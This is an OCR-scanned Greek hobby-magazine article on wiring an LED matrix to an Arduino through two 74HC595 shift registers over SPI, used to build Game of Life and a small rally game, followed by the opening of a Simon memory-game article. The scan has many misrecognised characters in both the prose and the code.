Arduino. To LED matrix nou xpnoiponoinodue εμείς εἶναιτο NFM-12883AS- 
115. Πρόκειται για ша TUNIKA υλοποίηση µε 16 акробектес, οι шоо! апо 


4. Τα «master reset» και «output enable < αποτελούν εισόδους του τσιπ, οι οποίες ενεργοποιούνται µε TO 
λογικό μηδέν και ὀχι µε то λογικό Eva. AUTO φαίνεται και στο datasheet του τσιπ, Onou δίπλα στις ονομασίες 
των συγκεκριμένων акробектфу αναφέρεται η φράση «Active LOW». Έτσι, για την ενεργοποίηση των εξόδων 
του τσιπ, πρέπει να δώσουμε στο «output enable» To λογικὀ μηδὲν (OV). Αντίθετα, για уа εξασφαλίσουµε бт! 
To «master reset» Tou σειριακοὐ καταχωρητή δεν θα εκτελείται NOTE, αρκεί να δώσουμε στο OXETIKO ακροδέκτη 
το λογικό ἑνα (5V). 

5. Μπορείτε να χρησιμοποιήσετε οποιοδήποτε алло, αλλά θα πρέπει να λάβετε υπόψη σας την πιθανά διαφο- 
ρετικἠ διάταξη των ακροδεκτών του... 
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τους οποίους συνδέονται στις στήλες кі οι υπόλοιποι στις γραμμές (εικόνα 
3). Πα τη διασύνδεση του LED matrix θα μπορούσαμε уа δεσμεύσουμε 
16 акробектес Tou Arduino, алла дпос εἶπαμε και νωρίτερα κάτι τέτοιο 
θα συνιστούσε τεράστια σπατάλη. Ακριβώς γι΄ αυτό, θα επιστρατεύσουμε 
δύο 74HC595. Οι окто ἑξοδοι του ενὸς θα συνδεθούν στις στήλες του 
LED matrix, ενώ οι окто ἐξοδοι του ἄλλου στις γραμμές. AUTO ενδἑχε- 
ται να ἦταν αυτονόητο, αλλά υπάρχει και µια λιγότερο προφανἠς λεπτο- 
µέρεια: Ta δυο τσιπάκια θα συνδεθούν αλυσιδωτὰ! Ауті να συνδέσουµε 
κάθε shift register ξεχωριστά πάνω στο Arduino, θα συνδέσουμε μόνο то 
ἑνα. Το δεύτερο θα «τροφοδοτείται» µε δεδομένα апо τη σειριακἠ ἐξοδο 
του πρὠτου. "Осо γιατους ακροδέκτες <shift register clock> και <storage 
register clock» που διαθέτει κάθε τσιπ, αυτοί θα συνδεθούν μεταξύ τους 
και το κάθε ζευγάρι θα καταλήγει σε ἑναν ακροδέκτη Tou Arduino. Με 
αυτή τη συνδεσμολογἰα τα δύο 74HC595 θα εἶναι απόλυτα συγχρονισμὲ- 
να: Θα χρησιμοποιούν το ἴδιο ρολόι για τη μετάδοση των δεδομένων апо 
то Arduino (κοινὸ shift register clock) και θα εμφανίζουν та περιεχὀμενάἁ 
τους στις εξόδους τους ταυτόχρονα (κοινὸ storage register clock). Επο- 
μένως, για τη διασύνδεση του LED matrix θα χρησιμοποιήσουμε δύο shift 
register, οι οποίοι µε τη σειρἁ τους θα συνδέονται πάνω στο Arduino µε 
τρεις акробектес (εικὀνα 4). 


E serial data output ЕК = 


serial data input 
serial clock serial clock 
memory clock 
master reset 

output enable 


outputs 


00 91... 06 07 00 01... 


serial data input 


master reset 


Εικόνα 4 

Το διάγραμμα Tou 
κυκλὠματός µας! 
Στην εικὀνα φαίνε- 
ται TO κρισιµότερο 
τμήμα, µε τους δύο 
shift register ка! 
To LED matrix. 2To 
Arduino καταλή- 
youv µόνο τρεις 
ακροδέκτες, που 
συνδέονται στη 
σειριακἠ εἰσοδο 
του πρώτου shift 
register και στις 
αντίστοιχες εισό- 
δους συγχρονισμού 
και των δύο. Οἱ 
ἐξοδοι του ενός 
shift register ελέγ- 
χουν тіс γραμμές 
του matrix ка! Οἱ 
ἑξοδοι του ἆλλου 
τις στήλες. 


serial data output 


memory clock 


output enable 


outputs 
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Σχεδιαστικὲς λεπτομέρειες 


Πριν προχωρήσουμε πρέπει να σταθούμε σε μερικὲς ακόµα λεπτομέρειες. 
Па τη σειριακἠ αποστολή των δεδομένων στους shift register θα χρη- 
σιμοποιήσουμε ἑνα апо τα κυκλώματα σειριακἠς επικοινωνίας του ENE- 
ξεργαστήἠ του Arduino. Συγκεκριµένα, θα χρησιμοποιήσουμε το κύκλωμα 
SPI. Το εν λὀγω κύκλωμα αναλαμβάνει να στείλει bit προς bit τα δεδομένα 
που του παρέχουμε, EVW ταυτόχρονα παράγει και το απαιτούμενο σήμα 
συγχρονισμού (serial clock). Αναφερόμενοι στο σειριακὀ τρόπο ENIKOIVW- 
νας Tou Arduino µε τους shift register, πρέπει να υπογραμμίσουμε кайт! 
ακόμα. Στἐλνοντας δύο byte στους shift register, το Χδεύτεροξ byte θα 
καταλήξει εντὸς του «πρώτου καταχωρητή (εκείνου που τροφοδοτείται 
He δεδομένα απευθείας апо To Arduino). Αντίστοιχα, το прото byte που 
θα στείλουμε θα καταλήξει στον δεύτερο καταχωρητή (εκείνον που τρο- 


Εικόνα 5 φοδοτείται µε δεδοµένα апо την ἐξοδο του ἄλλου). Τέλος, στο κὐκλωμά 
Η υλοποίηση του μας έχουμε συμπεριλάβει και πέντε διακόπτες, οι οποίοι µε τη βοήθεια 
киклФиатос µας ενὸς διαιρέτη τάσεων συνδέονται σε μία αναλογικἠ ғісобо του Arduino. 


σε breadboard. Па 

τη διασύνδεση του [ο] κὠδικας 

matrix θα πρέπει 

уа χρησιμοποιή- Ἐχοντας ετοιμάσει To hardware για τα δύο παιχνίδια, μπορούμε να περά- 


σετε ка! πρόσθετα σουµε στο software. Πάντως, πριν πούμε οτιδήποτε ἄλλο, кало θα ἦταν 
breadboard! Εκεί 


f να κατεβάσετε τον κὠδικα των δύο NalxvidIM@v και уа TOU ріЕете ша ματιὰ 
θα καταλήγουν και 3 А i А 
та καλώδια που (http://bit.ly/dhðð5argames). H TaKTIKN που ακολουθήσαμε για την ауа- 
στην εικόνα εκκρε- πτυξη των δυο παιχνιδιών δεν αποτελεἰ προϊόν της δικἠς µας έμπνευσης. 


поду στον αέρα (о! Ουσιαστικἀ, GUTO που κάναμε ἦταν να μιμηθούμε τη δομή του κὠδικα 
“гш shift στην οποία отпрібоутау та прота βντεοπαιχνἰδια. H επεξεργαστικἠ ισχύς 
` εκείνων των παιχνιδομηχανών ñTav εξαιρετικἀ περιορισμένη και όλα та 


κκ... 
..0...... 


.... 


++ scese ..... e... 
αυ, 


Arduino 
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παιχνίδια хтібоутау, UNOXPEWTIKA, γύρω апо τα υποσυστήματα που EKTE- 
λούσαν τις πιο βαριὲς εργασἰες: Εκεἰνα που παρήγαγαν το ойна της εικὀ- 
νας και του ἠχου. Βλέπετε, αυτὲς οι εργασἰες έπρεπε να εκτελούνται σε 
такта хроміка διαστήματα και µε μεγάλη ακρἰβεια. Κατά συνέπεια, κατα- 
νάλωναν μεγάλο μέρος των διαθέσιμων πόρων του συστήματος και εἶχαν 
προτεραιότητα ἑναντι Ἐκάθεξ ἄλλης εργασίας. Με άλλα λόγια, ο κὠδικας 
για τα παιχνίδια εκείνης της εποχἠς ἦταν απόλυτα προσαρμοσμένος (και 
περιορισμένος) στις ιδιαιτερότητες και στις δυνατότητες των συστημὰ- 
των εικὀνας και ἠχου. Κάτι αντίστοιχο κάναμε кі εμεὶς, μεταφέροντας 
αυτή τη λογικἠ στο επίπεδο του κὠδικα. Εμεἰς βέβαια υιοθετήσαµε αυτή 
τη λογική και για ἑναν ακόµα λὀγο: Nati ο κὠδικας που προκύπτει εἶναι 
аплёс̧, ξεκάθαρος και λειτουργικὀς. 


Архіка αναπτύξαµε ша «μηχανή» για тіс βασικὲς λειτουργίες και πάνω 
σε αυτήν στηρἰξαµε το Game of Life αλλά και το μικρὸ ραλάκι. Ξεκινή- 
cape, λοιπὸν, κατασκευάζοντας Eva πρὀγραμμα το οποίο αναλαμβάνει 
το βασικὀ XEIPIOHO του hardware (διαβάζει τα πατήματα των διακοπτὠν 
και οδηγεἰ το LED matrix). Επομένως, πριν εξετάσουμε τον κὠδικα των 


1.1.1] 


Εικὀνα 6 

H υλοποίηση pas 
паідеше αρκετά, 
δεν το κρύβου- 
με... Ωστόσο τα 
προγραμματάκια 
που γράψαμε στη 
συνέχεια µας іка- 
νοποίησαν και µε 
το παραπάνω :) 
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Εικόνα 7 

Κάθε ομάδα 
ακροδεκτών του 
matrix πάτησε 
пауо σε ξεχωρι- 
отд breadboard. 
Επάνω στα δύο 
breadboard βρήκα- 
µε και τον απαιτού- 
evo χώρο για TN 
σύνδεση των αντι- 
στάσεων (current 
limiting resistors). 
Εφόσον η σάρωση 
του matrix γίνεται 
γραμμή προς γραμ- 
μή απὀ τον κὠδικά 
μας, οι αντιστάσεις 
τοποθετήθηκαν 
στους ακροδέκτες 
που ελέγχουν τις 
στήλες. Έτσι, κάθε 
LED που ανάβει 
έχει тп δική του, 
ξεχωριστή αντίστα- 
ση. Σε διαφορετική 
περίπτωση τα LED 
κάθε ενεργοποι- 
ημένης γραμμής 
θα μοιράζονταν 
την ἰδια αντίσταση 
και η PWTEIVOTNTA 
τους θα εξαρτιόταν 
апо το πλήθος των 
αναμμένων! 
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παιχνιδιὼν πρέπει να αναφερθούμε στην (κοινὴ) ραχοκοκαλιά τους: Tn 
«μηχανή» στην οποία στηρἰζονται... 


void setup () í 
DDRB |= (SPI_DATA | SPI_LATCH | SPI_CLOCK); 
SPCR = (1<<SPE) | (1<<MSTR); 
randomSeed(analogRead(A5)); 


) 


Παραπάνω @aivetal η συνάρτηση setup του προγρἀμματὸς µας. Κατὰ та 
γνωστά, σε αυτή τη συνάρτηση πραγματοποιούνται οι Васікес ρυθμίσεις 
του hardware. Αρχικά φροντίζουμε να µετατρέψουµε σε εξόδους τους 
ακροδέκτες του PORTB, οι οποίοι χρησιμοποιούνται апо то SPI. Στο δικό 
μας κύκλωμα οι συγκεκριμένοι ακροδέκτες χειρίζονται τους δύο shift 
register και, γενικότερα, στέλνουν δεδομένα χωρἰς να λαμβάνουν. Στη 
συνέχεια EVEPYONOIOUHE το κύκλωμα SPI και επιλέγουμε την κατάσταση 
λειτουργίας master. Σε αυτό το mode то SPI του Arduino θα ἐχει τον 
πλήρη ἐλεγχο της σειριακἠς επικοινωνίας και θα εἶναι υπεύθυνο για τη 
δηµιουργία του σήματος συγχρονισμού (serial clock). Τέλος, παίρνουμε 
µια μέτρηση апо µια αναλογικἠ εἰσοδο του Arduino. Όμως, η αναλογικἠ 
εἰσοδος που επιλέξαμε δεν εἶναι συνδεδεμένη πουθενὰ στο κύκλωμα. 
Κατά συνέπεια, η μέτρηση που λαμβάνουμε αποτελεἰ Eva δείγμα του ηλε- 
κτρομαγνητικού θορύβου και αποτελεἰ ¿vav πραγματικἁ τυχαίο αριθµό! 
Αυτός ο αριθμµὸς αποδίδεται σαν seed, στον αλγόριθμο παραγωγἠς yeu- 
δοτυχαίων αριθμών (randomSeed). 
void loop () í 

keypad_control(); 

update_buffer(); 

scan(); 


Arduino the way of the hacker! 


ЕЕС ССС ССС С СССІСССССС 


Н µηχανἠ στην οποία στηρἰζονται τα δύο παιχνίδια αποτελεἰται апо τρεις 
μόλις γραμμές. Βέβαια, καθεμία and αυτὲς καλεί µια μᾶλλον μεγάλη ou- 
νάρτηση. Н πρώτη συνάρτηση, ὁπως δηλώνει και τ’ ὀνομά της, ασχολεἰ- 
ται µε τους διακόπτες. H δεύτερη εἶναι εκείνη που φροντίζει να ενηµε- 
ρώνει κατάλληλα τα περιεχόμενα Tou frame buffer, λαμβάνοντας υπόψη 
της και τα τυχὸν πατήματα των διακοπτὠν. Еутдс αυτής της συνάρτησης 
τοποθετήσαμε αργότερα και τον κὠδικα του κάθε παιχνιδιού. Τέλος, η 
τρίτη συνάρτηση αναλαμβάνει να προβάλλει τα περιεχόμενα του frame 
buffer επάνω στο LED matrix. 


Στα ενδότερα 


O μηχανισμός που ελἐγχει τους διακόπτες, ὁπως кі εκείνος που οδηγεἰ 
το LED matrix, παρουσιάζουν ιδιαίτερο ενδιαφἑρον. Ας ξεκινήσουμε апо 
τον πρῶτο... 


// έλεγχος διακοπτών, εφόσον δεν εἶναι κλειδωμένοι 
if (!keypad_lock) í read_keypad(); } 
// αναμονή για το ξεκλείδωμα των διακοπτών 
if (keypad_lock) { 
keypad_timer++; 
if (keypad_timer == game_delay + 2) í 
keypad_timer = 0; 
keypad_lock = 0; 


} 


// κλείδωμα διακοπτών, εφόσον πατήθηκε Κάποιος 
if (keypad_val != ϐ) í keypad_lock = 1; } 


Отау καλεἰται η συνάρτηση Кеурай control ano τον κύριο βρὀχο (main 
loop) του προγράµµατος, δεν ελἐγχεται ἆμεσα η κατάσταση των біако- 
птом. Σκεφτείτε ὁτι κύριος βρόχος του προγράμματος επαναλαμβάνε- 
ται поло γρήγορα (εκατοντάδες φορὲς το δευτερόλεπτο). Εάν σε κάθε 
επανάληψη ελέγχονταν οι διακόπτες, ακόµα και το πιο σύντομο πάτημα 
κάποιου θα ερμηνευόταν апо то πρὀγραμμα σαν πολλαπλά πατήματα! 
Εξάλλου, πρέπει µε κἀποιο τρόπο να αντιμετωπίσουμε το θόρυβο avann- 
δησης των διακοπτὠν (bounce noise). П’ αυτούς τους λόγους η συνάρ- 
τηση keypad_control προβλέπει το αυτόματο «κλείδωμα» και «ξεκλεἰδω- 
ра» των διακοπτῶν. Συγκεκριµένα, κάθε φορά που εντοπίζεται το πάτημα 
ενὸς διακόπτη η συνάρτηση keypad_control σταματάει τους περαιτέρω 
ελέγχους των біакоптоу και ενεργοποιεἰ Evav μετρητή. Αυτός о µετρη- 
тїс λειτουργεί σαν Eva σύστημα χρονοκαθυστέρησης, το опоіо περιμένει 
την πάροδο ενὸς εὐλογου χρονικού διαστήματος και στη συνέχεια ενερ- 
γοποιεἰ εκ νέου τον EAEYXO των διακοπτών. То «εὐλογο хроуікд διάστη- 
μα» εἶναι κατάλληλα επιλεγμένο, ώστε το ξεκλείδωμα των διακοπτὼν 
να πραγματοποιείται αφού ολοκληρωθούν οι αναπηδήσεις κι ο θόρυβος 
που παράγουν. Ταυτόχρονα, το ἴδιο χρονικό διάστηµα εἶναι αρκετά μικρὸ, 
MOTE το πρόγραµµα να µη «χάνει» κανένα πάτημα. Σημειώστε τέλος ὁτι 
για ògo χρόνο εἶναι κλειδωμένοι οι διακόπτες, το проүрарра συνεχίζει 
κανονικἀ και δεν παγώνει. Αυτό συμβαϊνει γιατὶ η χρονικἠ καθυστέρηση 
*бєүу* επιτυγχάνεται µε τη βοήθεια της συνάρτησης delay! Αντίθετα, για 
τη μέτρηση του χρόνου ως το ξεκλείδωμα των διακοπτὠν το πρὀγραμμα 
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μετράει πόσες φορὲς ἐχει κληθεί η συνάρτηση keypad_control. Βλέπετε, 
η εν λόγω συνάρτηση каліта апо τον κύριο βρὀχο του προγράµµατος 
-- και µε σχετικἀ σταθερὀ PUBHO. 
index = 0; 
row_data = 1; 
while (index < 8) í 
SPDR = frame_buffer[index]; // αποστολή πρώτου byte 
while(!(SPSR & (1<<SPIF))); // αναμονή για ολοκλ αποστολής 


SPDR = row_data;// αποστολή δεύτερου byte 
while(!(SPSR & (1<<SPIF))); // αναμονή για ολοκλ αποστολής 
// παλμός για τη µεταφορά των δεδοµένων από τους σειριακούς 
// καταχωρητες στις μνήμες των 74HC595 (storage reg clock) 
PORTB |= DATA_LATCH;// εναλλαγή από 0 σε 1.. 
PORTB &= “БАТА 1АТСН;// „кат από 1 σε 0 
// σύντομη καθυστέρηση για να λάμψουν ta LED 
delayMicroseconds(320) ; 
// προετοιμασία δείκτη για ενεργοποίηση επόµενης γραμμής 
row_data = row_data << 1; 
// προετοιμασία δείκτη για το επόμενο byte oto frame buffer 
index++; 

} 

SPDR = 255; 

while(!(SPSR & (1<<SPIF))); 

SPDR = 0; 

while(!(SPSR & (1<<SPIF))); 

PORTB |= SPI_LATCH; 

PORTB &= ~SPI_LATCH 


H συνάρτηση nou οδηγεἰ To LED matrix στέλνει στους shift register ev- 
ма ζευγάρια byte. То прото byte του κάθε ζευγαριού καταλήγει στον 
shift register, ο οποίος ελέγχει τις στήλες TOU matrix. То δεύτερο byte 
καταλήγει στον shift register ο οποίος ελέγχει τις γραμμές. Όπως αντι- 
λαμβάνεστε, λοιπὀν, το прото byte προέρχεται ano το frame buffer -- 
τον πίνακα ὀπου αποθηκεύονται όλα ὁσα θέλουμε να εμφανιστούν στο 
matrix. Το δεύτερο byte παράγεται δυναμικά. Ξεκινάει µε την τιμὴ 1 και 
στη συνέχεια, για τη διαδοχική ενεργοποίηση των γραμμών του matrix, 
ολισθαίνει κάθε фора προς τα арістера (bitshift left). Το matrix διαθέτει 
окто γραμμές, αλλά ὁπως εἶπαμε αρχικἁ στους καταχωρητὲς αποστἑλ- 
λονται εννιἁ ζευγάρια byte. То vato ζευγάρι ἐχει σαν αποστολἠ την 
πλήρη anevepyonoinon του matrix. Έτσι, μεταξύ των διαδοχικὠν «σαρώ- 
σεων» του matrix kapia γραμμή δεν θα παραμένει ενεργἠ. Αν συνέβαινε 
κάτι τέτοιο Ta LED της συγκεκριμένης γραμμἠής θα ἐλαμπαν περισσότερο! 
Τέλος, αξίζει να σημειώσουμε µια ακόμα λεπτομέρεια. Па να στείλουμε 
va byte στους shift register то αποθηκεύουµε σε ἑναν ειδικὀ καταχω- 
ρητή του Arduino µε то ὀνομα SPDR. Κάθε φορά που γράφουμε кат! 


Arduino the way of the hacker! 
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εντὸς TOU SPDR κι εφόσον το σύστημα SPI εἶναι ενεργοποιημένο, ξεκινά 
αυτόματα η σειριακἠ του μετάδοση. Κάπου εδώ орос προκύπτει Eva ζη- 
τηµατάκι. Па να µεταδώσουμε Eva byte σειριακἁ και να εἱμαστε βέβαιοι 
ότι στάλθηκε σωστὰ апо το µικροελεγκτἠ µας, πρέπει να εἰμαστε βέβαιοι 
ὁτι εκείνη τη στιγμή δεν πραγματοποιείται καμία ἄλλη αποστολἠ. Па το 
λόγο авто, κάθε фора που στέλνουμε Eva byte και πριν κάνουμε οτιδἠ- 
ποτε ἄλλο, περιμένουμε να ολοκληρωθεὶ η αποστολἠ. Αυτή η αναμονή 
επιτυγχάνεται ελέγχοντας το bit µε το ὀνομα 5ΡΙΕ (5РІ Interrupt Flag), 
του καταχωρητή SPSR (SPI Status Register). Το συγκεκριμένο bit Aap- 
βάνει αυτόματα την τιµή 1, κάθε фора που ολοκληρώνεται η σειριακἠ 
апостол ενὸς byte. 


Το παιχνίδι της ζωής 


Καταρχάς, αν δεν το ἐχετε кау ἠδη, ρίξτε ша ματιὰ στους συνδέσμους 
που NPOTEIVAHE архіка, WOTE να δείτε пері τίνος πρόκειται αυτὸ то Game 
of Life (http://en.wikipedia.org/wiki/Conway's_Game_of Life και www. 
bitstorm.org/gameoflife). Μπορείτε επἰσης va χαζέψετε και TO OXETIKO Bi- 
ντεο, που δεἰχνει την κατασκευἠ µας σε λειτουργία: 


http://deltahacker.gr/?p=4137 


Σχεδιάζοντας τον κὠδικα, καταλήξαμε σύντομα о’ Eva βασικὀ, γενικὀ OU- 
ипёраона: To πρὀγραμμα πρέπει να σχεδιάζει στο matrix διαφορετικά 
πράγματα, ανάλογα µε то στάδιο εκτἐλεσής του. Па το λόγο αυτό opioa- 
µε µια μεταβλητή µε то буора mode, η οποία αποφασίσαμε OT! ауа паса 
στιγµἠ θα δηλώνει σε ποιο στάδιο βρίσκεται το проүрарра. Ορἰσαμε λοι- 
nov та εξἠς: Ὅταν η mode ἐχει την τιμὴ 1, το πρὀγραμμα βρίσκεται σε 
κατάσταση αναμονής και περιμένει το πάτημα κάποιου κουμπιού. Μόλις 
πατήσουμε капою διακόπτη η mode παΐρνει την τιμή 2 και το проүрарра 
περνάει σε επὀµενη κατάσταση, κατὰ την οποία διασπείρει μερικὲς KOU- 
κίδες σε τυχαίες θέσεις του frame buffer. Μόλις τοποθετηθούν οι τυχαίες 
κουκίδες το πρόγραµµα перуа αυτόματα στο ENOHEVO στάδιο (mode = 3). 
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Ебо γίνονται τα περισσότερα: Σε такта хроміка διαστήματα TO прбүран- 
на εφαρμόζει του κανόνες του Game of Life πάνω στα περιεχόμενα του 
frame buffer. Ταυτόχρονα, το πρόγραμμα ελέγχει το αν πατήθηκε κάποιο 
κουμπὶ ἡ το αν ολοκληρώθηκε η εφαρμογἠ των κανόνων, χωρὶς να αλλά- 
Eel кат! στο frame buffer. Σε αυτὲς τις περιπτώσεις, ο κὠδικας θεωρεἰ От! 
θέλουμε να τερµατίσουµε το Game of Life ἡ бт! το σύστημα έφτασε σε 
αδιἐξοδο και η περαιτέρω εφαρμογἠ των κανόνων δεν επηρεάζει то ano- 
τἐλεσμα. Έτσι, η µεταβλητή mode παἰρνει пал! την 1 και το πρόγραµµα 
περνά εκ νέου στην κατάσταση αναµονἠς. 


Ола оса περιγράψαµε υλοποιούνται апо τη συνάρτηση update_buffer. 
Κάθε фора που καλείται η εν λόγω συνάρτηση τσεκάρει τη μεταβλητή 
mode και ανάλογα µε την τιμή της εκτελεἰ το αντίστοιχο κομμάτι κὠδικα. 
Τέλος, µια ενδιαφέρουσα λεπτομέρεια του συγκεκριμένου προγράµµατος 
αφορά στην ύπαρξη και δεύτερου frame buffer. Βλέπετε, η εφαρμογή 
των κανόνων του game of life πραγματοποιείται σταδιακἁ (οι κουκἰδες κι 
η γειτονιά της καθεμιάς ελἐγχονται διαδοχικἀ). Οι αλλαγές που πρέπει να 
πραγματοποιηθούν σε каӨе кохкіба, δηλαδή, υπολογίζονται σταδιακά κι 
Ох! ταυτόχρονα. Επομένως, αν η κάθε αλλαγή εφαρμοζόταν ἆμεσα πάνω 
στο frame buffer η τύχη των επόμενων κουκἰδων θα επηρεαζόταν апо 
την μελλοντικἠ κατάσταση των προηγουμένων κουκἰδων κι ὀχι απὀ την 
τρέχουσα. AUTO το πρὀβλημα λύθηκε µε την ύπαρξη ενὸς δεύτερου frame 
buffer, ὁπου αποθηκεύονται οι ὁποιες μεταβολὲς υπολογίζονται για τις 
κουκίδες. Στο τέλος, τα περιεχόμενα του δεύτερου frame buffer µεταφέ- 
ρονται στο прото και ...η ζωή συνεχίζεται. 


Run user, run! 


Па το ραλάκι χρησιμοποιήθηκε πάλι n µεταβλητή mode και η συνάρτηση 
update_buffer κατασκευάστηκε αρθρωτά. Κάθε άρθρωμα (κάθε τµήµα 
της update_buffer) αντιστοιχεί σε µια συγκεκριμένη τιμή της mode και 
εκτελεἰται µόνο τὀτε. AUTO το πρόγραµµα περιλαμβάνει περισσὀτερες ка- 
ταστάσεις. Πέρα ano την αρχικἡ διαθέτει μία ενδιάμεση, η οποία προετοι- 
рас το frame buffer για την εκκίνηση του παιχνιδιού. Ακολουθεί η κύρια 
κατάσταση, ката την οποία το πρὀγραμμα υπολογίζει κάθε φορά pia νέα 
γραμμὴ για το χάρτη (για το περιβάλλον στο οποίο μοιάζει να κινεῖται το 
ὀχημά нас). Αυτή η νέα γραμμή προστίθεται στην «κορυφἠ» του frame 
buffer, αφού προηγουμένως ολισθήσουν τα περιεχὀμενὰ της μια θέση 
проста κάτω. Με αυτὸν τον τρόπο ο δρόμος στον опоіо κινείται το ὀχημά 
μας κυλάει και ανανεώνεται διαρκώς. Στην ἴδια κατάσταση λειτουργίας, 
το проүрарра κάθε στιγμή ελέγχει το αν η θέση του οχήματος βρίσκεται 
επάνω σε κάποιο εμπόδιο. Σε αυτή την περίπτωση, το πρὀγραμμα перуа 
σε επόμενη κατάσταση (game over), ката την οποία η οθόνη γεμίζει ano 
κάτω προς τα πάνω. Όταν ολοκληρωθεί το γἐμισμα το πρόγραµµα περνά 
στην κατάσταση αναµονἠς και η μεταβλητὴ mode παἰρνει πάλι την τιµή 1. 


Τα πιο ενδιαφἐροντα σημεία αυτού του προγράµµατος αποτελούν η ελα- 
φρὠς τροποποιημένη συνάρτηση scan και το τμήμα της update_buffer, то 
οποίο σχεδιάζει και ρολάρει το δρόμο του οχήματος. Αν και η συνάρτηση 
scan αποτελεἰ κομμάτι της μηχανής Eni της οποίας τρέχει το παιχνίδι µας, 
ἡμασταν υποχρεωμένοι να την τροποποιήσουμε. Βλέπετε, τα pixel που 
αντιστοιχούν στα εμπόδια ἐπρεπε να ἐχουν διαφορετικἠ φωτεινότητα 
ano το pixel που αναπαριστὰ το ὀχημά µας. Ωστόσο η μελέτη µας δεν EXE! 
φτάσει στο απαιτούμενο επἱπεδο, ὥστε να χρησιμοποιούμε frame buffer 
µε πληροφορἰες χρώματος (ἡ ἐστω φωτεινότητας). Έπρεπε λοιπὸν να 
εφαρμόσουμε κάποιο απλούστερο κολπάκι, ὥστε τα pixel των εμποδίων 


Arduino the way of the hacker! 


ЕЕЕ ССС 


να εμφανίζονται λιγότερο φωτεινά, σε σχἐση µε TO pixel του οχήματος. 
Па το λόγο αυτὸ τροποποιήσαμε τη συνάρτηση scan ὥστε να προβάλει 
τα τοιχώματα μία μόνο φορὰ, ауа ἐξι σαρώσεις του matrix! Αντίθετα, то 
ὀχημά µας προβάλλεται διαρκώς. Έτσι, το μάτι µας (το опоіо λειτουργεί 
σαν ολοκληρωτής, алла αυτό δεν εἶναι του παρὀντος) αντιλαμβάνεται та 
pixel των τοιχωμάτων σαν πολύ πιο ασθενἠ και ξεθωριασμένα. 


Н διαδρομή που πρέπει να ακολουθήσει το ὀχημά µας παράγεται δυναμικά 
και μεταβάλλεται τυχαία. Όπως αντιλαμβάνεστε, όμως, το проүрарра 
δεν θα μπορούσε να αραδιάζει εντελώς τυχαἰα τα εμπόδια. Αν λειτουρ- 
γούσε µε GUTOV τον τρόπο θα συνέβαινε πολύ συχνὰ να προκύπτουν aði- 
ἐξοδα ἡ πολύ στενὰ περάσματα, апо τα οποία δεν θα μπορούσε να διέλθει 
το ὀχημα. Па να αντιμετωπίσουμε ауто το ζήτημα εισάγαµε ша µεταβλη- 
Tñ η οποἰα ορίζει την κατεύθυνση που θα πρέπει κάθε φορά να ακολουθεἰ 
το ὀχημα. Аот η μεταβλητἠ βέβαια μεταβάλλεται τυχαία, οπότε και η 
διαδροµἠ που θα πρέπει να ακολουθήσουμε παἰζοντας μεταβάλλεται eni- 
σης τυχαία. Το проүрарџа χρησιμοποιεὶ αυτή τη μεταβλητἠ για να ανοίξει 
τα κατάλληλα κενὰ στη διαδρομή, WOTE η οδήγηση να εἶναι and εὐκολη 
EWG πολύ δύσκολη, αλλά πάντοτε εφικτή! Με λίγα λόγια, για να λύσουμε 
το πρὀβλημα, το αντιστρέψαμε: Το πρόγραµµα δεν υπολογίζει τυχαία та 
εμπόδια που θα τοποθετήσει στη διαδρομή µας, αλλά υπολογίζει τυχαία 
τη διαδρομή που πρέπει να ακολουθήσουμε. Με βάση αυτήν, катаскеџа- 
ζεται εν τέλει και το ...οδόστρωμα. 


Ὅπως και στην περίπτωση Tou Game of Life, μπορείτε να µας δεἰτε να 
παίζουμε µε το ραλάκι στο σχετικὀ βίντεο που έχουμε αναρτήσει στο site 
του περιοδικού (http://deltahacker.gr/?p=4137). Τέλος, για οποιαδήποτε 
απορία, μπορείτε πάντα να ρἰξετε την ερὠτησὴ σας στο forum. Кал 
διασκέδαση! 
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Skills 
Beginner 


Tags: 

Arduino, LED, 
buttons, toys, 
programming 


8 
εξασκ Ίσετε; 


: Ἕνα к <po os 
, ЕХ, | εθιστικὀ па! (viði 


GAI г  μνήμ σας εἶναι άριστη 


Tile rapt ЖН n€ 
о αιχνιδάκι на СЕТ I, για} 
εκτονώσετε τη δημιουργικὀτητἁ σας ;) 


Εικόνα 1 

Το πρώτο παιχνίδι 
Simon. Αποκλείς- 
ται уа un το ЕХЕТЕ 
δει κάπου! Αν ὀχι 
ζωντανά ка! ипро- 
ота сас, oiyoupa 
σε κάποιο site µε 
παιχνίδια σε flash. 
Ti; Δεν παίζετε 
τέτοια παιχνίδια; 
Κρίμα, γιατί ау 
παίζατε, óÀo και 
κάπου θα εἶχατε δει 
ΤΟ Simon... ;) 
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Av και беу εἶναι αρκετά διαδεδομένο 
στην Ελλάδα --τουλάχιστον εγὼ 
δεν το συνάντησα στα παιδικἁ 
μου χρόνια--, το Simon εἶναι 
ἑνα пало και ката κάποιο 
τρόπο γνώριμο παιχνίδι 
μνήμης. Όχι παιχνίδι 
στον υπολογιστή, παι- 
Χνίδι σαν αυτά που 
εἰχαμε μικροὶ: Πλα- 
OTIKO και βαρύ, μ’ Eva 
συρόμενο διακόπτη 
on-off και µπαταρἰ- 
ες. Στην αρχικἠ του 
µορφή, то Simon ἧταν 
KUKÀIKÓ κι εἶχε τέσσε- 
ρα χρωματιστά κουμπιά, 
µε τέσσερα λαμπάκια (Eva 
κάτω ano κάθε κουμπ!). O 
εγκἐφαλος του παιχνιδιού (ο 
Simon) αναβόσβηνε τα λαμπάκια 
µε τυχαία σειρὰ και περίμενε апо то 
χρήστη να πατήσει µε την ἴδια ακριβώς 
σειρά, τα αντίστοιχα κουμπιά. Κάθε φορά που 
о паіктпс αναπαρήγαγε σωστά την αλληλουχία πατημάτων, το παιχνἰδι 
γινόταν δυσκολότερο: Τα λαμπάκια που αναβόσβηναν γίνονταν περισσὀ- 
тера кі о παἰκτης έπρεπε να θυμάται ὁλο και μεγαλύτερες αλληλουχίες! 
Εάν ο παἰκτης ¿Kave va λάθος, το παιχνίδι ἄρχιζε and την αρχή. 


Όπως υποψιάζεστε, δεν πρὀκειται να πἀρουμε τους δρόμους και τα paya- 
йа. Δεν θα προσπαθήσουμε να βρούμε то Simon για να το αγοράσουμε, 
алла θα φτιάξουμε το бікб µας. Θα χρειαστούμµε μόνο το Arduino, τέσσε- 
ρα LED κι ἄλλους τόσους διακόπτες. 


Ξεκινάμε; 


Па αρχή, να πούμε бт! δεν έχει καμία σημασία ποιο Arduino έχετε. Σε 
αντίθεση µε την κατασκευἠ την опоіа εἶδαμε σε προηγούμενο τεύχος!, 
αυτή τη φορὰ δεν θα ἐχουμε κανένα πρόβλημα µε τη μνήμη RAM. Το 
